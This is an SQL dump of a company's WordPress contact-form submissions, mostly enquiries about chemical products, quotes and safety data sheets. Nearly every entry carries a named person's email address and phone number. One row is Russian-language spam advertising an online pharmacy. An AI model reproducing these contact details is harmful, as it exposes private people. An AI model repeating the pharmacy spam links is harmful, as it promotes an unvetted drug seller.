INSERT INTO `wp_postmeta` VALUES (40998, 4753, '_field_3', 'В нашей интернет аптеке вы сможете заказать софосбувир и даклатасвир по низкой стоимости \r\n&lt;a href=&quot;http://sofosbuvir-express24.ru&quot;&gt;hepcinat lp из индии&lt;/a&gt;\r\n&lt;a href=&quot;http://sofosbuvir-express24.ru&quot;&gt;natco sofosbuvir&lt;/a&gt;\r\n&lt;a href=&quot;http://sofosbuvir-express24.ru&quot;&gt;sofovir natdac&lt;/a&gt;\r\n&lt;a href=&quot;http://sofosbuvir-express24.ru&quot;&gt;дженерики софосбувира отзывы&lt;/a&gt;\r\n&lt;a href=&quot;http://sofosbuvir-express24.ru&quot;&gt;купить hepcinat lp в новосибирске&lt;/a&gt;\r\n'); 
INSERT INTO `wp_postmeta` VALUES (40999, 4753, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41000, 4753, '_sub_id', '4753'); 
INSERT INTO `wp_postmeta` VALUES (41001, 4754, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41002, 4754, '_seq_num', '847'); 
INSERT INTO `wp_postmeta` VALUES (41003, 4754, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41004, 4754, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41005, 4754, '_field_1', 'Elena Kilina'); 
INSERT INTO `wp_postmeta` VALUES (41006, 4754, '_field_10', 'MED TECHNOLOGY SRL'); 
INSERT INTO `wp_postmeta` VALUES (41007, 4754, '_field_2', 'elena.kilina@medtechnology.it'); 
INSERT INTO `wp_postmeta` VALUES (41008, 4754, '_field_8', '(068) 953-5114'); 
INSERT INTO `wp_postmeta` VALUES (41009, 4754, '_field_3', 'Good morning, please can you send me your quotation for MS-143H, we need fixed unit price for 4 years , forecast 6 GAL/year. Thank you very much in advance, I&#039;m waiting for your answer!'); 
INSERT INTO `wp_postmeta` VALUES (41010, 4754, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41011, 4754, '_sub_id', '4754'); 
INSERT INTO `wp_postmeta` VALUES (41012, 4755, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41013, 4755, '_seq_num', '848'); 
INSERT INTO `wp_postmeta` VALUES (41014, 4755, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41015, 4755, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41016, 4755, '_field_1', 'Christopher Lau'); 
INSERT INTO `wp_postmeta` VALUES (41017, 4755, '_field_10', 'Sculpteo'); 
INSERT INTO `wp_postmeta` VALUES (41018, 4755, '_field_2', 'chris.lau@sculpteo.com'); 
INSERT INTO `wp_postmeta` VALUES (41019, 4755, '_field_8', '(857) 891-9088'); 
INSERT INTO `wp_postmeta` VALUES (41020, 4755, '_field_3', 'Hello,\r\n\r\nI&#039;m interested in acquiring a quote for the solvent called Vertrel. Would you be able to provide a quote for different sizes (quart, gallon, etc)? If you could also provide the safety data sheet on Vertrel, I would greatly appreciate it. \r\n\r\nThanks\r\nChris'); 
INSERT INTO `wp_postmeta` VALUES (41021, 4755, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41022, 4755, '_sub_id', '4755'); 
INSERT INTO `wp_postmeta` VALUES (41023, 4756, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41024, 4756, '_seq_num', '849'); 
INSERT INTO `wp_postmeta` VALUES (41025, 4756, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41026, 4756, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41027, 4756, '_field_1', 'harsh darji'); 
INSERT INTO `wp_postmeta` VALUES (41028, 4756, '_field_10', 'acorrphen coating pvt ltd'); 
INSERT INTO `wp_postmeta` VALUES (41029, 4756, '_field_2', 'harsh.acor91@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (41030, 4756, '_field_8', '(886) 611-4819'); 
INSERT INTO `wp_postmeta` VALUES (41031, 4756, '_field_3', 'hey i am harsh darji i am the coordinator at acorrphen and we are manufacture of epoxy curing agent and so i think u want use our product so i wil give u a company website www.acorrphen.com so u interested just sent me my mail.             \r\n\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (41032, 4756, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41033, 4756, '_sub_id', '4756'); 
INSERT INTO `wp_postmeta` VALUES (41034, 4757, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41035, 4757, '_seq_num', '850'); 
INSERT INTO `wp_postmeta` VALUES (41036, 4757, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41037, 4757, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41038, 4757, '_field_1', 'adane melese'); 
INSERT INTO `wp_postmeta` VALUES (41039, 4757, '_field_10', 'ethiopianairlines'); 
INSERT INTO `wp_postmeta` VALUES (41040, 4757, '_field_2', 'AdaneM@ethiopianairlines.com'); 
INSERT INTO `wp_postmeta` VALUES (41041, 4757, '_field_8', '(251) 115-1745'); 
INSERT INTO `wp_postmeta` VALUES (41042, 4757, '_field_3', 'dear sir ,\r\n\r\nGreetings from Ethiopian airlines.\r\n\r\nwe would like to procure the below mentioned detergent chemicals . which is \r\nDescription: Detergent  ,MIL-PRF-220 .\r\ncould you please send us the MSDS and product detailed specification .in addition the exact contact for procurement .\r\n\r\nthanks \r\n'); 
INSERT INTO `wp_postmeta` VALUES (41043, 4757, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41044, 4757, '_sub_id', '4757'); 
INSERT INTO `wp_postmeta` VALUES (41045, 4758, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41046, 4758, '_seq_num', '851'); 
INSERT INTO `wp_postmeta` VALUES (41047, 4758, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41048, 4758, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41049, 4758, '_field_1', 'rickey dalbehera'); 
INSERT INTO `wp_postmeta` VALUES (41050, 4758, '_field_10', 'Agilent technologies'); 
INSERT INTO `wp_postmeta` VALUES (41051, 4758, '_field_2', 'recon.rickey@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (41052, 4758, '_field_8', '(996) 287-2013'); 
INSERT INTO `wp_postmeta` VALUES (41053, 4758, '_field_3', 'Please share datasheet &amp; rohs for MPN- &quot;Krytox LVP Grease 0.5 Oz Tube&quot;\n\nPlease validate if this MPN is correct or not. If not then please advice the correct MPN'); 
INSERT INTO `wp_postmeta` VALUES (41054, 4758, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41055, 4758, '_sub_id', '4758'); 
INSERT INTO `wp_postmeta` VALUES (41056, 4760, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41057, 4760, '_seq_num', '852'); 
INSERT INTO `wp_postmeta` VALUES (41058, 4760, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41059, 4760, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41060, 4760, '_field_1', 'Tes'); 
INSERT INTO `wp_postmeta` VALUES (41061, 4760, '_field_10', 'test'); 
INSERT INTO `wp_postmeta` VALUES (41062, 4760, '_field_2', 'wewer@kk.com'); 
INSERT INTO `wp_postmeta` VALUES (41063, 4760, '_field_8', '(334) 343-4343'); 
INSERT INTO `wp_postmeta` VALUES (41064, 4760, '_field_3', 'dfsdfsdf'); 
INSERT INTO `wp_postmeta` VALUES (41065, 4760, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41066, 4760, '_sub_id', '4760'); 
INSERT INTO `wp_postmeta` VALUES (41073, 4764, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41074, 4764, '_seq_num', '853'); 
INSERT INTO `wp_postmeta` VALUES (41075, 4764, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41076, 4764, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41077, 4764, '_field_1', 'Christina Johnson'); 
INSERT INTO `wp_postmeta` VALUES (41078, 4764, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (41079, 4764, '_field_2', 'christina.johnson@omnova.com'); 
INSERT INTO `wp_postmeta` VALUES (41080, 4764, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41081, 4764, '_field_3', 'I am looking for your most current US version preferably GHS SDS for MS-122N/CO2.  I would appreciate if you would email this to me.\n\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (41082, 4764, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41083, 4764, '_sub_id', '4764'); 
INSERT INTO `wp_postmeta` VALUES (41084, 4765, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (41085, 4765, '_seq_num', '343'); 
INSERT INTO `wp_postmeta` VALUES (41086, 4765, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41087, 4765, '_field_12', 'Martha Lane'); 
INSERT INTO `wp_postmeta` VALUES (41088, 4765, '_field_13', 'Bacon Lane Architect, LLC'); 
INSERT INTO `wp_postmeta` VALUES (41089, 4765, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (41090, 4765, '_field_14', 'Martha@baconlanearch.com'); 
INSERT INTO `wp_postmeta` VALUES (41091, 4765, '_field_15', '(201) 697-5774'); 
INSERT INTO `wp_postmeta` VALUES (41092, 4765, '_field_16', 'Looking for an epoxy resin for limestone dutchman repairs (stone to stone).  Is this applicable to your product(s)?'); 
INSERT INTO `wp_postmeta` VALUES (41093, 4765, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (41094, 4765, '_sub_id', '4765'); 
INSERT INTO `wp_postmeta` VALUES (41095, 4766, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41096, 4766, '_seq_num', '854'); 
INSERT INTO `wp_postmeta` VALUES (41097, 4766, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41098, 4766, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41099, 4766, '_field_1', 'Gerald Smith'); 
INSERT INTO `wp_postmeta` VALUES (41100, 4766, '_field_10', 'Spider Company'); 
INSERT INTO `wp_postmeta` VALUES (41101, 4766, '_field_2', 'gerald@spidercompany.com'); 
INSERT INTO `wp_postmeta` VALUES (41102, 4766, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41103, 4766, '_field_3', 'I&#039;m looking for a release agent for use in our powder coating process.  We would like to simplify the removal of layers of polyester powder coat from our tooling.  The release agent cannot contain silicone.  '); 
INSERT INTO `wp_postmeta` VALUES (41104, 4766, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41105, 4766, '_sub_id', '4766'); 
INSERT INTO `wp_postmeta` VALUES (41106, 4767, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41107, 4767, '_seq_num', '855'); 
INSERT INTO `wp_postmeta` VALUES (41108, 4767, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41109, 4767, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41110, 4767, '_field_1', 'SHARMILLA'); 
INSERT INTO `wp_postmeta` VALUES (41111, 4767, '_field_10', 'TROPICAL ASSEMBLIES'); 
INSERT INTO `wp_postmeta` VALUES (41112, 4767, '_field_2', 'PURCHASING@TROPICALASSEMBLIES.COM'); 
INSERT INTO `wp_postmeta` VALUES (41113, 4767, '_field_8', '(954) 396-9999'); 
INSERT INTO `wp_postmeta` VALUES (41114, 4767, '_field_3', 'Hello,\r\nCould you quote me on PN -  MS470C/miller stephenson for 275 pcs\r\nPlease advise\r\nThank you\r\nSharmilla'); 
INSERT INTO `wp_postmeta` VALUES (41115, 4767, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41116, 4767, '_sub_id', '4767'); 
INSERT INTO `wp_postmeta` VALUES (41117, 4768, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41118, 4768, '_seq_num', '856'); 
INSERT INTO `wp_postmeta` VALUES (41119, 4768, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41120, 4768, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41121, 4768, '_field_1', 'Imran'); 
INSERT INTO `wp_postmeta` VALUES (41122, 4768, '_field_10', 'Imran impex'); 
INSERT INTO `wp_postmeta` VALUES (41123, 4768, '_field_2', 'ybimra@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (41124, 4768, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41125, 4768, '_field_3', 'Price Krytox gpl 227 '); 
INSERT INTO `wp_postmeta` VALUES (41126, 4768, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41127, 4768, '_sub_id', '4768'); 
INSERT INTO `wp_postmeta` VALUES (41128, 4769, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41129, 4769, '_seq_num', '857'); 
INSERT INTO `wp_postmeta` VALUES (41130, 4769, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41131, 4769, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41132, 4769, '_field_1', 'Ann'); 
INSERT INTO `wp_postmeta` VALUES (41133, 4769, '_field_10', 'tendynasty'); 
INSERT INTO `wp_postmeta` VALUES (41134, 4769, '_field_2', 'Ann@ten-dynasty.com'); 
INSERT INTO `wp_postmeta` VALUES (41135, 4769, '_field_8', '07634788744'); 
INSERT INTO `wp_postmeta` VALUES (41136, 4769, '_field_3', '\r\nHow are you today?\r\nThis is Ann from TenDynasty ,which is an integrated manufacturer for plastic injection molding, die casting, stamping and automation assembly for many years in Dongguan China.\r\nI am writing to look for the chances to support your esteemed company.Here is our company website: www.ten-dynasty.com. Any interested or if you can not find the part you required, please let me know.\r\nWarmly welcome to visit our factory and thank you for your time.\r\n\r\nBR.with thanks\r\nAnn'); 
INSERT INTO `wp_postmeta` VALUES (41137, 4769, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41138, 4769, '_sub_id', '4769'); 
INSERT INTO `wp_postmeta` VALUES (41139, 4770, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41140, 4770, '_seq_num', '858'); 
INSERT INTO `wp_postmeta` VALUES (41141, 4770, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41142, 4770, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41143, 4770, '_field_1', 'Martin Koenig'); 
INSERT INTO `wp_postmeta` VALUES (41144, 4770, '_field_10', '3M Deutschland GmbH (before Membrana GmbH), 42289 Wuppertal, Germany'); 
INSERT INTO `wp_postmeta` VALUES (41145, 4770, '_field_2', 'mkoenig@mmm.com'); 
INSERT INTO `wp_postmeta` VALUES (41146, 4770, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41147, 4770, '_field_3', 'In the past we bought some Versamid 140 Epoxy from you. Is this still available? \nIf not what is the comparable product?\nCan you confirm that the comparable product has the same chemical composition and approvals as Versamid 140?\nIf yes please send me the confirmation.\nCould you send me a sample?\nBest Regards\nMartin Koenig\n\n'); 
INSERT INTO `wp_postmeta` VALUES (41148, 4770, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41149, 4770, '_sub_id', '4770'); 
INSERT INTO `wp_postmeta` VALUES (41150, 4771, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41151, 4771, '_seq_num', '859'); 
INSERT INTO `wp_postmeta` VALUES (41152, 4771, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41153, 4771, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41154, 4771, '_field_1', 'Kim Jong-un'); 
INSERT INTO `wp_postmeta` VALUES (41155, 4771, '_field_10', 'Missles R Us'); 
INSERT INTO `wp_postmeta` VALUES (41156, 4771, '_field_2', 'Kim.Jong-un@Misslesrus.com'); 
INSERT INTO `wp_postmeta` VALUES (41157, 4771, '_field_8', '(123) 456-7890'); 
INSERT INTO `wp_postmeta` VALUES (41158, 4771, '_field_3', 'I would like a quote on Military Spec Conformal Coatings.'); 
INSERT INTO `wp_postmeta` VALUES (41159, 4771, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41160, 4771, '_sub_id', '4771'); 
INSERT INTO `wp_postmeta` VALUES (41161, 4772, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41162, 4772, '_seq_num', '860'); 
INSERT INTO `wp_postmeta` VALUES (41163, 4772, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41164, 4772, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41165, 4772, '_field_1', 'Shaaron Anderson'); 
INSERT INTO `wp_postmeta` VALUES (41166, 4772, '_field_10', 'Cobham Mission Systems'); 
INSERT INTO `wp_postmeta` VALUES (41167, 4772, '_field_2', 'shaaron.anderson@cobham.com'); 
INSERT INTO `wp_postmeta` VALUES (41168, 4772, '_field_8', '(716) 667-6222'); 
INSERT INTO `wp_postmeta` VALUES (41169, 4772, '_field_3', 'Good evening,\nWe are looking to purchase some:\nKrytox IPA/DF or\nVYDAX IPA or\nDupont Dryfilm RA/IPA\n\nI use to order this material from Miller-Stephenson when I was a buyer/Planner at our facility in St. Petersburg, Fl, we have now relocated to Orchard Park NY and are looking for a supplier.\n\nThanks,\n'); 
INSERT INTO `wp_postmeta` VALUES (41170, 4772, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41171, 4772, '_sub_id', '4772'); 
INSERT INTO `wp_postmeta` VALUES (41172, 4773, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41173, 4773, '_seq_num', '861'); 
INSERT INTO `wp_postmeta` VALUES (41174, 4773, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41175, 4773, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41176, 4773, '_field_1', 'Kyle Davis'); 
INSERT INTO `wp_postmeta` VALUES (41177, 4773, '_field_10', 'General Motors Desert Proving Ground'); 
INSERT INTO `wp_postmeta` VALUES (41178, 4773, '_field_2', 'kyle.a.davis@gm.com'); 
INSERT INTO `wp_postmeta` VALUES (41179, 4773, '_field_8', '(928) 388-5760'); 
INSERT INTO `wp_postmeta` VALUES (41180, 4773, '_field_3', 'I would like to request an SDS for a product:\nFreon TF\nMS-180 CO2\nThank You'); 
INSERT INTO `wp_postmeta` VALUES (41181, 4773, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41182, 4773, '_sub_id', '4773'); 
INSERT INTO `wp_postmeta` VALUES (41183, 4774, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41184, 4774, '_seq_num', '862'); 
INSERT INTO `wp_postmeta` VALUES (41185, 4774, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41186, 4774, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41187, 4774, '_field_1', 'Arash'); 
INSERT INTO `wp_postmeta` VALUES (41188, 4774, '_field_10', 'Behzeest'); 
INSERT INTO `wp_postmeta` VALUES (41189, 4774, '_field_2', 'Behpad8010@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (41190, 4774, '_field_8', '(647) 518-1361'); 
INSERT INTO `wp_postmeta` VALUES (41191, 4774, '_field_3', 'Hello\r\nI am Arash currently staying in Toronto. I have mostly 3 years of working experience in Behzeest Lubricant and chemical producer company in Tehran. Before i come here, in early 2013 to 2016 i worked as a sales engineer for this company. Now came here for my master. I would love to send my resume for any possible working opportunities provided by miller-stephenson if it is allowed. \r\nKind Regards\r\nToronto Canada\r\nArash'); 
INSERT INTO `wp_postmeta` VALUES (41192, 4774, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41193, 4774, '_sub_id', '4774'); 
INSERT INTO `wp_postmeta` VALUES (41194, 4775, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41195, 4775, '_seq_num', '863'); 
INSERT INTO `wp_postmeta` VALUES (41196, 4775, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41197, 4775, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41198, 4775, '_field_1', 'Yannick Dion'); 
INSERT INTO `wp_postmeta` VALUES (41199, 4775, '_field_10', 'Bombardier'); 
INSERT INTO `wp_postmeta` VALUES (41200, 4775, '_field_2', 'yannick.dion@aero.bombardier.com'); 
INSERT INTO `wp_postmeta` VALUES (41201, 4775, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41202, 4775, '_field_3', 'Hi,\r\nMy name is Yannick Dion I’m supplier compliance for Bombardier. I see in my supplier portal that   corrective action section is empty and waiting after an  answer from you side. Could you take action on this please. Thank you \r\n'); 
INSERT INTO `wp_postmeta` VALUES (41203, 4775, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41204, 4775, '_sub_id', '4775'); 
INSERT INTO `wp_postmeta` VALUES (41205, 4776, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41206, 4776, '_seq_num', '864'); 
INSERT INTO `wp_postmeta` VALUES (41207, 4776, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41208, 4776, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41209, 4776, '_field_1', 'Yannick Dion'); 
INSERT INTO `wp_postmeta` VALUES (41210, 4776, '_field_10', 'Bombardier'); 
INSERT INTO `wp_postmeta` VALUES (41211, 4776, '_field_2', 'yannick.dion@aero.bombardier.com'); 
INSERT INTO `wp_postmeta` VALUES (41212, 4776, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41213, 4776, '_field_3', 'Hi,\r\nMy name is Yannick Dion I’m supplier compliance for Bombardier. I see in my supplier portal that   corrective action section is empty and waiting after an  answer from you side. Could you take action on this please. Thank you \r\n'); 
INSERT INTO `wp_postmeta` VALUES (41214, 4776, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41215, 4776, '_sub_id', '4776'); 
INSERT INTO `wp_postmeta` VALUES (41216, 4777, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41217, 4777, '_seq_num', '865'); 
INSERT INTO `wp_postmeta` VALUES (41218, 4777, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41219, 4777, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41220, 4777, '_field_1', 'Helen Hoffman'); 
INSERT INTO `wp_postmeta` VALUES (41221, 4777, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (41222, 4777, '_field_2', 'helenrhoffman.smartertactics@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (41223, 4777, '_field_8', '(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (41224, 4777, '_field_3', 'Hi,\r\n\r\nYour website&#039;s design is absolutely brilliant. The visuals really enhance your message and the content compels action. I&#039;ve forwarded it to a few of my contacts who I think could benefit from your services.\r\nWhen I was looking at your site, though, I noticed a mistake that you&#039;ve made re: search engine optimization. It&#039;s a relatively important fix. Would you like me to write it up so that you can share it with your web team? If this is a priority, I can also get on a call.\r\n\r\n\r\nRegards,\r\n\r\nHelen R. Hoffman\r\nDigital Marketing Manager\r\n(877)-228-1545\r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (41225, 4777, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41226, 4777, '_sub_id', '4777'); 
INSERT INTO `wp_postmeta` VALUES (41227, 4778, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (41228, 4778, '_seq_num', '344'); 
INSERT INTO `wp_postmeta` VALUES (41229, 4778, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41230, 4778, '_field_12', 'Pat DiPiano'); 
INSERT INTO `wp_postmeta` VALUES (41231, 4778, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (41232, 4778, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (41233, 4778, '_field_14', 'pdipiano@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (41234, 4778, '_field_15', '(484) 999-8490'); 
INSERT INTO `wp_postmeta` VALUES (41235, 4778, '_field_16', 'Can you tell me the correct  lubricant  to use on my Mercedes Benz 2015 door gaskets.\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (41236, 4778, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (41237, 4778, '_sub_id', '4778'); 
INSERT INTO `wp_postmeta` VALUES (41238, 4779, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41239, 4779, '_seq_num', '866'); 
INSERT INTO `wp_postmeta` VALUES (41240, 4779, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41241, 4779, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41242, 4779, '_field_1', 'Cralos Parra'); 
INSERT INTO `wp_postmeta` VALUES (41243, 4779, '_field_10', 'Avianca INC.'); 
INSERT INTO `wp_postmeta` VALUES (41244, 4779, '_field_2', 'CARPARRA@AVianca.com'); 
INSERT INTO `wp_postmeta` VALUES (41245, 4779, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41246, 4779, '_field_3', 'Good afternoon.  We kindly request your assistance providing us the SDS of your product: MS-122XD.  Thanks in advance.  Rgds\n\n'); 
INSERT INTO `wp_postmeta` VALUES (41247, 4779, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41248, 4779, '_sub_id', '4779'); 
INSERT INTO `wp_postmeta` VALUES (41249, 4780, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41250, 4780, '_seq_num', '867'); 
INSERT INTO `wp_postmeta` VALUES (41251, 4780, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41252, 4780, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41253, 4780, '_field_1', 'Michelle Becerra'); 
INSERT INTO `wp_postmeta` VALUES (41254, 4780, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (41255, 4780, '_field_2', 'michelle.becerra@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (41256, 4780, '_field_8', '(512) 519-3911'); 
INSERT INTO `wp_postmeta` VALUES (41257, 4780, '_field_3', 'Please provide me an SDS , shelf life and storage temperature requirements for cleaning agent MS-762.'); 
INSERT INTO `wp_postmeta` VALUES (41258, 4780, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41259, 4780, '_sub_id', '4780'); 
INSERT INTO `wp_postmeta` VALUES (41260, 4781, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41261, 4781, '_seq_num', '868'); 
INSERT INTO `wp_postmeta` VALUES (41262, 4781, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41263, 4781, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41264, 4781, '_field_1', 'Helen Bergstrom'); 
INSERT INTO `wp_postmeta` VALUES (41265, 4781, '_field_10', 'Saint-Gobain'); 
INSERT INTO `wp_postmeta` VALUES (41266, 4781, '_field_2', 'helen.bergstrom@saint-gobain.com'); 
INSERT INTO `wp_postmeta` VALUES (41267, 4781, '_field_8', '(508) 351-7172'); 
INSERT INTO `wp_postmeta` VALUES (41268, 4781, '_field_3', 'Hello,\r\nI was wondering if you make any food grade (FDA compliant) PTFE release agents?\r\n\r\nThanks,\r\nHelen'); 
INSERT INTO `wp_postmeta` VALUES (41269, 4781, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41270, 4781, '_sub_id', '4781'); 
INSERT INTO `wp_postmeta` VALUES (41271, 4782, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41272, 4782, '_seq_num', '869'); 
INSERT INTO `wp_postmeta` VALUES (41273, 4782, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41274, 4782, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
